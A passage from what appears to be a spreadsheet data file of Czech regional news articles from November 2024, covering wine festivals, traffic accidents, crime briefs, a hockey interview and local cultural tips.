Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_527_3364817354_ddfee2c3392067b3fec7.html</t>
  </si>
  <si>
    <t>ddfee2c3392067b3fec7</t>
  </si>
  <si>
    <t>Klatovský festival vína</t>
  </si>
  <si>
    <t>Klatovský festival vína Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Rádi bychom vás pozvali na 5. ročník Klatovského festivalu vína , který se uskuteční v Klatovech v malebných prostorech Mercandinových sadů. Vychutnat si zde budete moct nabídku deseti vinařství z Moravy a Čech, ale také získat cenné informace a odpovědi na vaše vinařské otázky. Samozřejmostí je i vhodné občerstvení, které doplní širokou paletu nabízeného vína . Očekávat můžete bohatý kulturní program. K poslechu budou znít tóny cimbálové muziky, které ve večerních hodinách vystřídá rockově naladěná kapela. Nezapomínáme i na vaše ratolesti, pro které bude na místě připraven zábavný program. Vstup na akci je zdarma. Návštěvníci si mohou zakoupit a degustovat nabízená vína pouze z aktuálních festivalových skleniček. Těšíme se na vaši účast. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_528_3241093630_4b3f1365a7cbdceb26d3.html</t>
  </si>
  <si>
    <t>4b3f1365a7cbdceb26d3</t>
  </si>
  <si>
    <t>Krimi zprávy z Pelhřimovska: lupič z klenotnictví je ve vazbě, mikrospánek může</t>
  </si>
  <si>
    <t>Krimi zprávy z Pelhřimovska: lupič z klenotnictví je ve vazbě, mikrospánek může Recidivista, který vyloupil klenotnictví v Pelhřimově , je ve vazbě Šperky za dva miliony korun ukradl v pelhřimovském klenotnictví pětačtyřicetiletý recidivista. S pistolí v ruce přinutil prodavačku vydat cennosti. Policisté lupiče dopadli v Brně . Tam je nyní ve vazební věznici. Muž byl v minulosti osmnáctkrát trestaný. Při objasňování loupeže kriminalistům pomohly výpovědi svědků a záběry z palubních kamer řidičů. Krimi Opilý řidič neměl ani doklady, policie ho chytila v Mnichu Téměř dvě promile alkoholu naměřili policisté šestadvacetiletému řidiči v Mnichu. Muž navíc neměl řidičské oprávnění a auto bylo bez platné technické kontroly. Krimi Mikrospánek způsobil nehodu u Miletína Při mikrospánku přejel řidič octavie do protisměru u Miletína , kde narazil do fabie. Při nehodě se zranili dva lidé. Škoda dosáhla devadesát tisíc korun. Krimi Nepozorný řidič havaroval u Vodné Při odbočování u Vodné vyjel sedmadvacetiletý řidič mimo silnici a narazil do značky. S autem skončil v příkopu a zranil se. Nehody Zloděj se vloupal do domu v Rynárci Do rodinného domu v Rynárci se vloupal neznámý pachatel. Poškozením dveří způsobil škodu pětadvacet tisíc korun. Z domu nic neukradl. Krimi Autor: Ondřej Švára Autor person Ondřej Švára</t>
  </si>
  <si>
    <t>4280</t>
  </si>
  <si>
    <t>2990</t>
  </si>
  <si>
    <t>20241101_529_3242304181_fbcbf2f1e8112bdce2a6.html</t>
  </si>
  <si>
    <t>fbcbf2f1e8112bdce2a6</t>
  </si>
  <si>
    <t>Mahulena Bočanová dostala od Čechů sodu: Zatímco se navážela do koloběžkářů, sama porušovala předpisy</t>
  </si>
  <si>
    <t>Mahulena Bočanová dostala od Čechů sodu: Zatímco se navážela do koloběžkářů, sama porušovala předpisy Oblíbená česká herečka přestřelila. Zatímco silně kritizovala pražské koloběžkáře, sama se dopouštěla vážné a nebezpečné chyby. Oblíbená herečka Mahulena Bočanová se velmi rozčílila a rázně zkritizovala lidi pohybující se po Praze na koloběžkách. Své rozhořčení prostřednictvím videa sdílela na sociálních sítích, neuvědomila si ovšem jednu velmi důležitou věc. Za své pochybení dostala od Čechů pořádný kartáč. Přestože s ní mnoho fanoušků souhlasilo, kritiku na svou osobu si z velké části zasloužila. Rozzlobili ji koloběžkáři Oblíbená česká herečka Mahulena Bočanová se stále objevuje na televizních obrazovkách a divadelních prknech. Zároveň je velice aktivní na sociálních sítích, kde pravidelně zveřejňuje fotografie a videa ze svého soukromého i pracovního života . Fanoušci milují její humor a mnohdy i nadsázku, kterou ve svých příspěvcích používá. Nyní však přestřelila. Na svém Instagramu zveřejnila video, v němž kritizuje koloběžkáře v Praze . Rozčilená Mahulena Bočanová : Kvůli nezodpovědným lidem si její dcera udělala zranění i Zdroj fotografie: Nextfoto Na tom by rozhodně nebylo nic špatného. Mnoho lidí, stejně jako Mahulenu, totiž rozčilují lidé bezhlavě se řítící na koloběžkách po rušných pražských ulicích. „Můžete mi někdo vysvětlit, kdy už konečně se v Praze , v takovém městě, kde je tolik aut a tolik lidí tady žije , zakážou ty koloběžky, co mají velký kolo vepředu a malý vzadu nebo ty debilní na to jedno kolečko? Je to nebezpečný, člověk neví, jestli to patří na silnici, nebo na chodník, protože oni si jezdí na chodníku i na silnici, a potom když vy někoho přejedete a zabijete, tak půjdete sedět!“ cituje hereččina slova web Blesk . Rozčílila se na velmi nevhodném místě Mahulena však své rozčílení natáčela přímo za jízdy v autě. To mnoho jejích sledujících šokovalo a rozhořčilo. Podle nich totiž káže vodu a sama pije víno . Místo, aby se naplno věnovala řízení svého vozu, nadávala na koloběžkáře a rozptylovala se natáčením videa . A kritika ze stran internetových uživatelů na sebe nenechala dlouho čekat. „Rozčiluje se na lidi na koloběžkách a bojí se, aby je náhodou nesrazila, ale přitom se natáčí během řízení. Co k tomu říct,“ napsala jedna z diskutujících. Mahulena Bočanová přidala fotku, na které vypadá na 80: „V mé klinice měli měsíc zavřeno,“ vtipkuje herečka Zobrazit příspěvek na Instagramu Příspěvek sdílený Mahulena Bočanová (@mahulena_bocanova_official) Přestože na sociálních sítích dostala za své jednání vyčiněno, mnoho lidí s ní souhlasilo. Mezi přikyvující se zařadila i její kolegyně Adéla Gondíková . Videem pobavila i porotkyni StarDance Tatianu Drexler , která nyní čelí velké kritice. Kvůli čemu se na ni diváci zlobí , jsme vám na DámskémDeníku již prozradili. Autor: Tereza Kuchyňková Autor person Tereza Kuchyňková</t>
  </si>
  <si>
    <t>20241101_53_3253887245_834d26e278801f60ce43.html</t>
  </si>
  <si>
    <t>834d26e278801f60ce43</t>
  </si>
  <si>
    <t>Hazard se životy dětí</t>
  </si>
  <si>
    <t>Hazard se životy dětí Roman Šebrle , moderátor: Další ze série jen těžko pochopitelných případů se stal ve Zdicích na Berounsku. Hlídce tam ujížděl silně podnapilý řidič. Soňa Porupková, moderátorka: V autě navíc vezl tři malé děti. O tom, že vůz neměl absolutně pod kontrolou, se na vlastní kůži přesvědčil i jeden z policistů. Tomu totiž přejel nohu. Kateřina Sejková, reportérka: Nechybělo moc a mohlo to dopadnout hodně špatně. Alkohol , plné auto dětí a řidič hazardér. Pavel Zít, dopravní policista: Řídil nestandardním způsobem a zásadně se odlišoval od ostatních. Kličkoval ze strany na stranu. Kateřina Sejková, reportérka: Právě tady v ulici Komenského ve Zdicích na Berounsku hlídka stála. Řidič nejdříve chtěl zastavit, pak si to ale rozmyslel, šlápl na plyn a začal ujíždět. Pavel Zít, dopravní policista: V tuto chvíli řidič uvedeného vozidla přejel kolegovi nohu. Kateřina Sejková, reportérka: Vše se odehrálo přibližně na půl kilometrové trase. Řidič naštěstí boj s policisty v zádech rychle vzdal. Prý dostal strach. Pavel Zít, dopravní policista: Děti byly vystrašený a právě brečely. Michaela Richterová, mluvčí Policie ČR Středočeského kraje : Přístroj na měření alkoholu mu naměřil pozitivní výsledek s hodnotou téměř dvě promile. Roman Budský , dopravní expert: Takový lidé potom skutečně mohou na té silnici způsobit snadno masakr. A pokud mají na palubě svého automobilu malé děti, tak ty následky mohou být ještě horší. Taková děcka jsou přece jenom menší, křehčí. Ta zranění se potom týkají především hlavy, krku, páteře. Kateřina Sejková, reportérka: V tomto případě se naštěstí nikomu nic nestalo, ale vysvětlit vypjatou situaci dětem bude daleko složitější. Z nepříjemného zážitku se mohou ještě hodně dlouho vzpamatovávat. Michaela Richterová, mluvčí Policie ČR Středočeského kraje : Policisté řidiči sdělili podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. Kateřina Sejková, reportérka: Podobný případ, kdy opilý šofér sedl za volant a za sebou měl dvě bezbranné děti, se stal letos v červnu na Vyškovsku. Řidič tam ve vysoké rychlosti vyletěl ze silnice a havaroval. Obě děti na místě zemřely. Soud nezodpovědného otce tento týden poslal za mříže na sedm let a dva měsíce. Více se těmto hazardérům za volantem budou věnovat dnešní krimi zprávy.</t>
  </si>
  <si>
    <t>594510</t>
  </si>
  <si>
    <t>20241101_530_3241028907_aa13cedd227e39f923c6.html</t>
  </si>
  <si>
    <t>aa13cedd227e39f923c6</t>
  </si>
  <si>
    <t>Evropa? Připadám si, jako bych se vrátil v čase, usměje se obránce Banes Motoru Will Reilly</t>
  </si>
  <si>
    <t>Evropa ? Připadám si, jako bych se vrátil v čase, usměje se obránce Banes Motoru Will Reilly Přišel do Banes Motoru s vizitkou důrazného a také produktivního obránce. Sedmadvacetiletý téměř metrákový kanadský pořízek Will Reilly (27 let) zatím plní spíše roli tvrďáka, nebojí se poprat a zastat svých spoluhráčů, ale body na jeho kontě přibývají jen pomalu. Zatím má čtyři za jeden gól a tři asistence. „Loni jsem vyhrál titul, letos bych si to chtěl zopakovat,“ říká ke svému cíli pro letošní sezonu a zároveň tím připomíná loňský triumf v zámořské ECHL s týmem Florida Everblades . PAVEL KORTUS České Budějovice Jihočeši se aktuálně nacházejí na jedenácté příčce extraligové tabulky, dnes je čeká domácí duel s Olomoucí (17:30). Toronto je hokejové město. V kolika letech jste s tímto sportem začínal a zkoušel jste za mlada i jiná odvětví? Toronto je město s obrovskou hokejovou tradicí. Začal jsem hrát, když mi byly asi dva nebo tři roky. Všichni tam hrají hokej, je to téměř jako součást kultury. Takže jsem začal opravdu brzy. Odmala jsem hodně sportoval. Na vysoké úrovni jsem hrál také lakros a nyní miluji golf. Ale na plné čáře u mě zvítězil hokej. Předurčovala vás robustní postava hned od začátků hokejové kariéry do role obránce? Zkoušel jste to někdy také v útoku, nebo třeba i v brance? Až do svých patnácti patnácti let jsem byl útočník. Teprve potom jsem se přesunul na pozici obránce. Ale v podstatě mohu hrát kdekoli. Čtyři sezony jste strávil v týmu Rensselaer Polytechnic Institute v univerzitní lize NCAA . Dokončil jste vysokou školu? Ano, dokončil. Jakou měla soutěž úroveň po hokejové stránce? Úroveň byla opravdu dobrá. Nejbližší cesta, jak se stát profesionálním hokejistou, je hrát se staršími a zkušenějšími hráči než s juniory. Byla to pro mě opravdu dobrá škola hokejového života. Byl jste draftován klubem NHL Pittsburgh Penguins a dva roky jste nastupoval za jeho farmářský tým v AHL. Byl jste někdy blízko startu v nejslavnější hokejové soutěži světa? Byl. Jednou jsem se dostal docela blízko, když jsem se rozcvičoval v zápase s New York Rangers , ale bohužel jsem si nezahrál. V uplynulém ročníku jste se stal se svým týmem Florida Everblades vítězem Kelly Cupu v ECHL. Je to váš největší úspěch v dosavadní kariéře? Řekl bych, že ano. Měli jsme opravdu skvělý tým a dali jsme se dohromady ve správný čas. Byla to parádní jízda a určitě to byl pro celý tým velký úspěch. Proč jste se v sedmadvaceti letech rozhodl k odchodu do Evropy ? Vždycky jsem snil o tom dostat dobrou příležitost a hrát hokej na nejvyšší možné úrovni. Česká extraliga je opravdu dobrá. Tak jsem prostě využil příležitosti. Boj o NHL považujete za uzavřený? Myslím, že ne. Jsem ještě celkem mladý. Proto se snažím každým dnem zlepšovat a uvidím, co mi život přinese. Byl jste už někdy předtím na starém kontinentu? Ano, mnohokrát. Podle čeho jste si vybral jako své další angažmá českobudějovický Motor? Někdy koncem loňské sezony jsem byl osloven vedením Motoru. Nabídka mě zaujala a říkal jsem si, že by bylo dobré zahájit jednání. Podle klubové vize se mi jevila skvělá příležitost uplatnit se. A tak jsem tady. Byl pro vás problém zvyknout si na širší kluziště, než na jakých se hraje v zámoří? Trochu ano a stále na tom pracuji. Na širším kluzišti je hra rozhodně jiná. Ale když jsem byl na střední škole, naše kluziště mělo olympijské rozměry. Takže jsem na to trochu zvyklý. Považujete se spíše za ofenzivního nebo defenzivního obránce? Asi jsem svým založením víc ofenzivní, ale hlavně v profesionálním hokeji se soustředím především na obranu. Při přesilovkách myslím na to, jak dát gól, to je jasné. Ale jinak je moje role hlavně v tom, abych držel puk mimo vlastní pásmo. Svůj první gól jste zaznamenal až v jedenáctém extraligovém utkání. Čekal jste, že to přijde dřív? Těžko říct, možná ano. Snažím se zlepšovat každým dnem během tréninků. Celý náš tým teď čeká na každou vstřelenou branku. Ohlásil se vám hned týmový pokladník Lukáš Pech s žádostí o příspěvek? Ještě ne, ale určitě zaplatím (úsměv). Do vašeho repertoáru patří očividně i bitky. Berete to jako součást vašeho stylu hry? Myslím, že souboje jeden na jednoho jsou jednou z nejdůležitějších součástí mé hry. Trénujeme to každý den v praxi. Ale co se týká bitek na ledě, neberu to jako součást mého hokejového stylu. Je atmosféra v Budvar aréně a na českých stadionech obecně odlišná od té v Kanadě ? Je to hodně odlišné. Opravdu nejsem zvyklý na to, že jsou lidé tak hlasití během hry. U nás je to jiné. Když se tam začne hrát, fanoušci obvykle ztichnou a projevují se jenom během pauz. Ale tady se křičí skoro celou dobu. Je to jako na fotbale, ale baví mě to a neruší mě to při hře. Co vás na první dobrou nejvíce zaujalo na životě v Evropě ? Je to všechno tak odlišné. Připadám si, jako bych se vrátil v čase. U nás je všechno moc moderní. Tady jsou budovy staré, ale krásně opravené. Líbí se mi tady i ty malé chodníčky, to u nás není. Cítím se tu dobře. Jak velký problém je jazyková bariéra? V kabině i v běžném životě? Problémy s komunikací nevnímám. Téměř každý tady mluví anglicky. Když mám během tréninku nějaké otázky, každý mi ochotně odpoví, nebo mi to přeloží. V každodenním životě jsem zažil nedorozumění jednou v restauraci, ale poradil jsem si. Které první české slovíčko jste uměl a jak jste na tom s češtinou teď? Bylo to asi dobrý den. To bylo myslím první. Postupně během tréninků začínám trochu rozumět hokejovým obratům, když mluví trenéři. Ale jinak musím říci, že čeština je obtížná řeč. Máte v plánu naučit se alespoň základy češtiny, nebo to nepovažujete za nutné? Snažím se pochytávat základní slova už během tréninků na ledě a v kabině mezi spoluhráči. I když je to obtížný jazyk na učení, nevzdávám se. Domů do Kanady se dostanete až po sezoně? Ano, až po sezóně. Během roku asi nebude čas. Čekají vás první Vánoce, které strávíte mimo domov? Ne, to ne. Mnoho Vánoc jsem trávil mimo domov. Obzvlášť u hokeje je to tak, že se dost zápasů hraje kolem svátků, takže je složité dostat se domů. Vlastně si ani nepamatuji, kdy jsem naposledy jel na Vánoce domů. Takže tento rok nebude odlišný od těch ostatních. Jste v Budějovicích sám, nebo s přítelkyní? Jsem tady sám. Přijede se za vámi v průběhu sezony podívat někdo z rodiny? Doufám, že ano, ale nejsem si jistý. Všichni jsou dost zaneprázdnění, tak uvidíme. V předsezónním rozhovoru jste uvedl, že se těšíte na vyhlášené české pivo . Už jste ho ochutnal a kolik jste jich zvládl vypít nejvíce za jeden večer? Ano, ochutnal jsem Plzeň a Budvar . Ale prozatím to byly jen malé ochutnávky. Jelikož každý den trénujeme, tak se žádná velká párty zatím nekonala. Uvidíme po sezóně. Jídlo je v Česku podobné tomu vašemu v Kanadě , nebo jste se musel přizpůsobovat? Jídlo je hodně podobné jako u nás, z toho jsem byl příjemně překvapený. Nevěděl jsem, co mě tady čeká, abych byl upřímný. Ale jím skoro stejně jako u nás, za což jsem rád. S čím byste byl spokojený, až se budete v dubnu balit na cestu domů? Byl bych spokojený, kdybychom získali titul. Loni se mi to povedlo, tak bych si to letos chtěl zopakovat. OBRÁNCE extraligových hokejistů Banes Motoru České Budějovice Will Reilly. Foto: Petr Tibitanzl</t>
  </si>
  <si>
    <t>8970</t>
  </si>
  <si>
    <t>20241101_531_3241028779_62f947d6f69f611ca52c.html</t>
  </si>
  <si>
    <t>62f947d6f69f611ca52c</t>
  </si>
  <si>
    <t>Mladá vína dorazí s bohatší chutí, ročník přál červeným</t>
  </si>
  <si>
    <t>Mladá vína dorazí s bohatší chutí, ročník přál červeným Otevírání svatomartinských vín se blíží, lidé se letos dočkají ještě před 11. listopadem. Vinaři si pochvalují kvalitu mladých vín a jejich plnou chuť. Radost jim kazí nižší výnosy, vína ročníku 2024 bude méně. PŘEMYSL SPĚVÁK Svatomartinská vína mohou letos zachutnat i lidem, kteří mladá vína jinak příliš nevyhledávají. Podle vinaře Bronislava Vajbara z Rakvic na Břeclavsku jsou totiž v chuti vyspělejší a mohutnější, než tomu bylo v předchozích ročnících. S kolegy se shodl na tom, že se na výsledku projevilo více slunce i to, že vinaři měli dostatek času vína připravit. Vinobraní totiž začalo asi o dva týdny dřív. RUBÍNOVÉ BARVY „Hrozny jsme sbírali díky vyzrálosti už od poloviny srpna. Vína jsou daleko více připravená do lahve, zklidněná. Budou svěží, ne však příliš kyselá. Ročník přál červeným ovocným vínům, která mají intenzivní barvu vyzrálost hroznů byla vysoká,“ zhodnotil Vajbar. Petr Gondáš z Národního vinařského centra to vidí podobně. „Kvalita letošních svatomartinských vín je lepší. Červená vína mají krásné, temně rubínové barvy. Růžová chutnají příjemně jogurtově. Bílá jsou vyváženě ovocná,“ shrnul vzorky, které se sešly před komisi hodnotící vína pro značku Svatomartinské. Díky vyšší cukernatosti při sběru mnohá vína nejsou zas až tak lehká, obsah alkoholu je podle Gondáše na hranici toho, co podmínky svatomartinských vín dovolují u bílých a růžových 12,5 a u červených 13 procent alkoholu . Kyselinka u mladých vín nechybí, vína tak nebudou fádní. Vinaři ještě před koncem října začali stáčet svatomartinská vína do lahví. „V Château Valtice plánujeme nalahvovat sto tisíc lahví svatomartinského vína . Dalších patnáct tisíc ve Vinařství Kovacs,“ sdělil David Šťastný, ředitel valtického vinařství, kde udržují nejdelší tradici výroby mladých vín. NABÍDKU ZÚŽILY MRAZY Na trh loni přišlo celkem více než dva miliony svatomartinských vín. Letos podle všeho rekord nepadne, naopak vína bude možná výrazně méně. Úrodu totiž značně ovlivnily jarní mrazy. Nižší výnosy se podle vinařů projevily zvlášť u hroznů tradičně určených pro mladá a svatomartinská vína . Obzvlášť zle dopadli vinaři se sklizní v Čechách . „V letošní nabídce mladých vín nám bude chybět tradiční Müller Thurgau. Přesto jsme hrozny, které se nám podařilo zachránit, sklízeli v perfektní kondici, s vysokou cukernatostí a ideálním množstvím kyselin,“ konstatovala výrobní ředitelka Vinných sklepů Kutná Hora Soňa Podholová. Foto: Archiv Deníku Co jsou svatomartinská vína První vína ročníku, ochrannou známku vlastní Vinařský fond. Jedná se o vína svěží a ovocitá, z hlediska zbytkového cukru se musí jednat o vína suchá. Lze je vyrábět z raných odrůd. Bílé z odrůd Veltlínské červené rané, Műller Thurgau a Muškát moravský, červené ze Svatovavřineckého a Modrého Portugalu, růžové kromě těchto dvou i z odrůdy Zweigeltrebe. Možné jsou též kupáže schválených odrůd. Podle tradice se vína otevírají na svátek sv. Martina 11. listopadu, který letos připadá na pondělí. Podle Vinařského fondu bude svatomartinské k dostání dřív, už o víkendu 9. a 10. listopadu. Přehled všech akcí spojených se svatomartinskými víny lze najít na webu vinazmoravyvinazcech.cz.</t>
  </si>
  <si>
    <t>295030</t>
  </si>
  <si>
    <t>20241101_532_3241028625_0b961a1ac452bd9c24b9.html</t>
  </si>
  <si>
    <t>0b961a1ac452bd9c24b9</t>
  </si>
  <si>
    <t>Našel ji za supermarketem. To řekl šestnáctiletý mladík o lahvi s bílým vínem</t>
  </si>
  <si>
    <t>Našel ji za supermarketem. To řekl šestnáctiletý mladík o lahvi s bílým vínem České Budějovice Alkohol a cigarety v rukou zjevně nezletilých osob odhalila v neděli 27. října odpoledne na Sokolském ostrově městská kamera. K pozitivnímu výsledku orientační dechové zkoušky na alkohol u jednoho z mladíků si dotyčný připíše i podání tabákového výrobku svým třináctiletým kamarádkám. Krátce před 16. hodinou spatřil operátor městského kamerového systému na Sokolském ostrově skupinku dětí, která si mezi sebou podávala láhev s bílým vínem . Mluvčí strážníků Věra Školková uvedla, že na místo k prověření zakázaných aktivit dětí hned zamířila hlídka městské policie. „Jak se ukázalo, alkohol naštěstí oslovil pouze šestnáctiletého mladíka. K dotazu, kde k alkoholu přišel, se vytasil s historkou, že plnou láhev našel spolu s kamarádem za jedním supermarketem,“ popsala mluvčí. Orientační dechová zkouška na alkohol u něj ukázala výsledek 0,15 promile. To ale nebyl jeho jediný prohřešek. „Kamerový záznam totiž odhalil také balení cigaret, které podal svým dvěma třináctiletým kamarádkám,“ dodala Věra Školková. Strážníci nezletilé předali do rukou rodičů. Případem se bude dále zabývat oddělení sociálně právní ochrany dětí magistrátu a přestupkem podle zákona o ochraně zdraví před škodlivými účinky návykových látek příslušný správní orgán. (ma)</t>
  </si>
  <si>
    <t>20241101_533_3241129901_4ab4cd7ae341d32732ae.html</t>
  </si>
  <si>
    <t>4ab4cd7ae341d32732ae</t>
  </si>
  <si>
    <t>Volný čas</t>
  </si>
  <si>
    <t>Volný čas Rubrika: kulturní tipy ČESKOBUDĚJOVICKO Výlov rybníka Dehtář Kdy: Do 5. listopadu Kde: Rybník Dehtář, okres České Budějovice Proč přijít: Dehtář je sedmý největší rybník v Jihočeském kraji a desátý v celé České republice . ČESKOKRUMLOVSKO Grill &amp;amp; Music Night Kdy: Sobota 2. listopadu od 18 h Kde: Český Krumlov , Krumlovský mlýn Vstupné: Zdarma Proč přijít: Každou listopadovou sobotu se můžete vydat do Krumlovského mlýna na speciality z grilu. Můžete se těšit na pečené selátko, grilované steaky přímo z ohně a tradiční českou kuchyni. Nebude chybět točené pivo z tanku, pohodová atmosféra a živá hudba. PRACHATICKO Lucerničky Kdy: Neděle 3. listopadu od 15 h Kde: Prachatice , Muzeum české loutky a cirkusu Vstupné: 50 korun Proč přijít: Výtvarná dílna ve spolupráci Muzea české loutky a cirkusu a Prachatického muzea. TÁBORSKO Strašidelný karneval Spektrum Scary fest Kdy: Pátek 1. až neděle 3. listopadu Kde: Městské středisko kultury a sportu Sezimovo Ústí Proč přijít: Scary fest zahájí v pátek v 15 hodin odpoledne dětský karneval. Do foyer Spektra dorazí Upír Lumír a s ním i hry, soutěže a tanec. Program bude pokračovat v kině Spektrum filmovým dušičkovým víkendem. V pátek po karnevalu si mohou děti i rodiče vychutnat film Příšerákovi 2. Program přitvrdí ve 20 hodin, kdy na řadu přijde klasika a Herzův Spalovač mrtvol, od 22 hodin začne speciální noční promítání pro otrlé, připravený je Vymítač ďábla: Znamení víry. Sobota nabídne pět filmů, dětské a rodinné projekce začínají v 10 a v 15 hodin. Do večera pak budou k vidění další tři filmy: Pět nocí u Freddyho, Ghost stories a od 22 hodin obstará závěr dne hororový Černý telefon. Na neděli jsou připravené čtyři filmy, děti potěší Krakenteena Ruby nebo Strašidlo cantervillské, které na večer vystřídá jeden z dílů ikonického hororu Vřískot a originální australský duchařský horor Mluv se mnou. Večerní a noční filmy jsou záměrně ponechané v původním znění s titulky. PÍSECKO Nebe nad knihovnou Kdy: Sobota 2. listopadu od 18 h Kde: Městská knihovna Písek Proč přijít: Veřejné pozorování noční oblohy s hvězdářem a astrofotografem Václavem Kubešem. Sraz účastníků je v Soukenické ulici u zadního vchodu do budovy MěK Písek . Rezervace na www.knih-pi.cz / astronomická pozorovatelna. JINDŘICHOHRADECKO Mosty porozumění Kdy: Sobota 2. listopadu od 17.17 h Kde: Jindřichův Hradec , kaple sv. Maří Magdalény Proč přijít: Svíčkové Nokturno, tzv. Předváděcí, vedle pocty všem „Dušičkám“ nabídne ukázky z Nokturen 2025. Na Dušičkovém a vstupním koncertu Nokturen při svíčkách účinkují Zdeňka Žádníková – umělecký přednes, Minyoung Park – zpěv ( Jižní Korea ), Johana Klímová – zpěv, David Cizner – zpěv, Eliška Klímová – housle, Jiří Emmer – varhany a Oldřich Vlček – housle. STRAKONICKO Podzimáles – Pestrý Gymstr Kdy: Pátek 1. listopadu po celý den Kde: Strakonice , Ostrov 1415 Vstupné: Zdarma Proč přijít: Přehlídka talentů z Gymnázia Strakonice . Výstava, autorské čtení, přednáška, hudba, dobročinný prodej. Rubrika transition_slide kulturní tipy</t>
  </si>
  <si>
    <t>26370</t>
  </si>
  <si>
    <t>20241101_534_3241027519_f3d05ebb037fb474ef0e.html</t>
  </si>
  <si>
    <t>f3d05ebb037fb474ef0e</t>
  </si>
  <si>
    <t>Řidič citroënu odmrštil toyotu do kamionu. Ten byl odstavený na zastávce autobusu</t>
  </si>
  <si>
    <t>Řidič citroënu odmrštil toyotu do kamionu. Ten byl odstavený na zastávce autobusu jana vandlíčková Vimpersko V úterý 29. října kolem páté hodiny odpoledne vzlétal záchranářský vrtulník k vážné nehodě na křižovatku na hlavním tahu silnice z Husince na Vimperk . Stala se tam nehoda a záchranáři tam ošetřovali dvě zraněné osoby. NÁRAZ ZEZADU Žena za volantem toyoty jedoucí od Vimperka na Husinec tam chtěla odbočit na Dáchov a ve chvíli, kdy dávala přednost autům v protisměru, do ní zezadu narazil řidič citroënu. Průběh nehody popsala pro Deník prachatická policejní mluvčí Martina Joklová. „ Toyota , která zastavila, byla odmrštěna mimo silnici na autobusovou zastávku, kde zrovna odtahová služba nakládala porouchaný kamion s návěsem,“ upřesnila mluvčí. ZRANĚNÉ DÍTĚ Vrtulník transportoval do nemocnice zraněné dítě, v nemocnici skončila také řidička toyoty. Podle prvotních informací je pravděpodobně na vině nehody řidič citroënu, jenž se plně nevěnoval řízení. Dopravní policisté nehodu vyšetřují. Jisté je, že na vině nebyl alkohol . „Škodu policisté na místě předběžně vyčíslili na více než dvě stě tisíc korun,“ uzavřela Martina Joklová. Řidič citroënu odmrštil toyotu do odstaveného kamionu na zastávce autobusu. NEHODA mezi Vimperkem a Husincem. Foto: PČR</t>
  </si>
  <si>
    <t>7330</t>
  </si>
  <si>
    <t>20241101_535_3241027368_91618486dc53675f30fb.html</t>
  </si>
  <si>
    <t>91618486dc53675f30fb</t>
  </si>
  <si>
    <t>Kontrolovali alkohol a drogy u mladistvých</t>
  </si>
  <si>
    <t>Kontrolovali alkohol a drogy u mladistvých V některých restauračních provozovnách ve Strakonicích se v pátek 27. října objevili policisté, hasiči, příslušníci celní správy a zaměstnanci České obchodní inspekce. klára alešová Strakonice V rámci celorepublikové akce s názvem ADAM alkohol , drogy a mládež, kontrolovali, kdo podává návykové látky nezletilým. Podle tiskové mluvčí strakonické policie Jaromíry Novákové byla noční akce zaměřená především na ty, kdo osobám mladším osmnácti let zpřístupňují alkohol , tabák nebo jiné návykové látky. Zda k porušování zákazu nedochází, zkontrolovali policisté ve Strakonicích v několika provozovnách. Během policejní akce nebyly zjištěny žádné podnapilé osoby mladší osmnácti let. Nedošlo ani k žádnému narušení veřejného pořádku a žádné mimořádné události,“ oznámila policejní mluvčí možná trochu překvapivé výsledky kontroly. Akce podobného typu budou pokračovat i do budoucna. Policisté se ale na prevenci zaměřují během celého roku, a to například i na středních a základních školách. „Navštěvujeme žáky a studenty s tématy, jako je například užívání návykových látek a trestná činnost s tím související,“ dodala Jaromíra Nováková .</t>
  </si>
  <si>
    <t>20241101_536_3241023101_c1d0bd5005661d78c8f1.html</t>
  </si>
  <si>
    <t>c1d0bd5005661d78c8f1</t>
  </si>
  <si>
    <t>Rakvický kotlík: Guláše provoněly sokolovnu, nechyběl ani kančí žaludek</t>
  </si>
  <si>
    <t>Rakvický kotlík: Guláše provoněly sokolovnu, nechyběl ani kančí žaludek Rakvice Vůně hořícího dřeva a různých kuchařských ingrediencí provoněla prostor u sokolovny v Rakvicích na Břeclavsku. Do okolí tak mířil jednoznačný signál, že přišel den oblíbené akce s prostým jménem Rakvický kotlík. „Je to už čtvrtý ročník akce, ke které nás inspirovala podobná přehlídka gulášů v břeclavské části Poštorná . Jsme kamarádi, co si občas zajdou do hospody na pivo . Tam jsme si řekli, proč to nerozšířit dál a nevyzkoušet taky u nás v Rakvicích ,“ řekl Deníku Vojtěch Halady s tím, že hlavním z party pořadatelů je Jiří Helešic. „Dnes je k ochutnání dvanáct gulášů, vesměs jsou to klasické guláše s výjimkou jednoho, uvařeného z kančích žaludků. Kuchařské týmy jsou vesměs od nás, pět jsou přespolní, dokonce i ze Slovenska ,“ dodal. Do degustačních misek návštěvníků tak kuchaři servírovali většinou hovězí guláše, k ochutnání ale byl i daňčí a jeden z týmů pod označením kovbojský guláš nabízel pochutinu, kde byla i ne zcela obvyklá gulášová ingredience, totiž fazole. Kuchařské týmy měly dostatek fantazie nejen při vaření, ale i při vymýšlení svých jmen. „Scházíme se u mě v takové kuchyňce, byla na zabijačky a další příležitosti. Tak když jsme přemýšleli, jak se tady představíme, padlo slovo kuchyňka a stali se z nás Kuchyňkáři,“ řekl jeden z kuchařů týmu. (mv) Ilustrační foto: Lukáš Hrdlička</t>
  </si>
  <si>
    <t>13400</t>
  </si>
  <si>
    <t>20241101_537_3241023103_c7d48493879e26b89b0c.html</t>
  </si>
  <si>
    <t>c7d48493879e26b89b0c</t>
  </si>
  <si>
    <t>V Hustopečích lidé ochutnají exkluzivní vína z celého světa</t>
  </si>
  <si>
